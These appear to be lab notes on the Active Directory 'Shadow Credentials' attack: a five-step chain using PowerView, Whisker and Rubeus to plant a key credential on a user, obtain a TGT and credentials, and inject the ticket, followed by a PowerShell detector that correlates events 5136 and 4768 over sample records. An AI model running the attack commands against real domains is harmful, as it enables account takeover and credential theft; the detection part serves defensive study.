Shadow Credentials

Abusing User Object

1. Enumerate the permissions

    Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}

2. Add the Shadow Credential

    Whisker.exe add /target:supportXuser

3. Using PowerView, see if the Shadow Credential is added.

    Get-DomainUser -Identity supportXuser

4. Request the TGT by leveraging the certificate

    Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show /nowrap

5. Inject the TGT in the current session or use the NTLM hash

    Rubeus.exe ptt /ticket:doIGgDCCBnygAwIBBaEDAgEW...
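
On the detection side, steps 2 and 4 leave two traces: a write to the target's msDS-KeyCredentialLink attribute (Security event 5136) and a certificate-based TGT request for the same account (event 4768 with PreAuthType 16). The following is an added example, not part of the original notes or of any tool named above, that correlates the two over constructed sample records. It assumes Directory Service Changes auditing with a SACL covering the target objects; the account names, the allow-list and the function name Find-KeyCredentialAbuse are hypothetical.

```powershell
# Constructed sample records shaped like Security events 5136 and 4768.
# All account names, DNs, addresses and times are made up for this example.
$Events = @(
    [pscustomobject]@{ Id = 5136; Time = [datetime]'2024-05-01T10:00:00'; SubjectUserName = 'MSOL_0a1b2c3d'
        ObjectDN = 'CN=alice,CN=Users,DC=example,DC=local'
        AttributeLDAPDisplayName = 'msDS-KeyCredentialLink'; OperationType = '%%14674' }
    [pscustomobject]@{ Id = 5136; Time = [datetime]'2024-05-01T10:05:00'; SubjectUserName = 'studentuser1'
        ObjectDN = 'CN=supportuser,CN=Users,DC=example,DC=local'
        AttributeLDAPDisplayName = 'msDS-KeyCredentialLink'; OperationType = '%%14674' }
    [pscustomobject]@{ Id = 4768; Time = [datetime]'2024-05-01T10:07:00'; TargetUserName = 'supportuser'
        PreAuthType = '16'; IpAddress = '::ffff:10.0.0.50' }
    [pscustomobject]@{ Id = 4768; Time = [datetime]'2024-05-01T10:10:00'; TargetUserName = 'alice'
        PreAuthType = '2'; IpAddress = '::ffff:10.0.0.21' }
)

function Find-KeyCredentialAbuse {
    param(
        [object[]]$Events,
        [string[]]$AllowedWriters = @(),                 # hypothetical allow-list (e.g. directory sync account)
        [timespan]$Window = [timespan]::FromHours(1)     # how long after the write to look for PKINIT
    )
    # 5136 "value added" (%%14674) on msDS-KeyCredentialLink by a writer outside the allow-list
    $writes = $Events | Where-Object {
        $_.Id -eq 5136 -and $_.AttributeLDAPDisplayName -eq 'msDS-KeyCredentialLink' -and
        $_.OperationType -eq '%%14674' -and $_.SubjectUserName -notin $AllowedWriters
    }
    foreach ($w in $writes) {
        # Assumption: the first RDN equals the sAMAccountName and contains no escaped commas.
        $target = ($w.ObjectDN -split ',')[0] -replace '^CN=', ''
        # 4768 with PreAuthType 16 (PKINIT) for the same account shortly after the write
        $pkinit = $Events | Where-Object {
            $_.Id -eq 4768 -and $_.TargetUserName -eq $target -and $_.PreAuthType -eq '16' -and
            $_.Time -ge $w.Time -and $_.Time -le $w.Time.Add($Window)
        } | Select-Object -First 1
        [pscustomobject]@{
            Target      = $target
            Writer      = $w.SubjectUserName
            WrittenAt   = $w.Time
            PkinitTgtAt = if ($pkinit) { $pkinit.Time } else { $null }
            PkinitFrom  = if ($pkinit) { $pkinit.IpAddress } else { $null }
            Severity    = if ($pkinit) { 'High' } else { 'Medium' }
        }
    }
}

Find-KeyCredentialAbuse -Events $Events -AllowedWriters 'MSOL_0a1b2c3d' | Format-Table -AutoSize
```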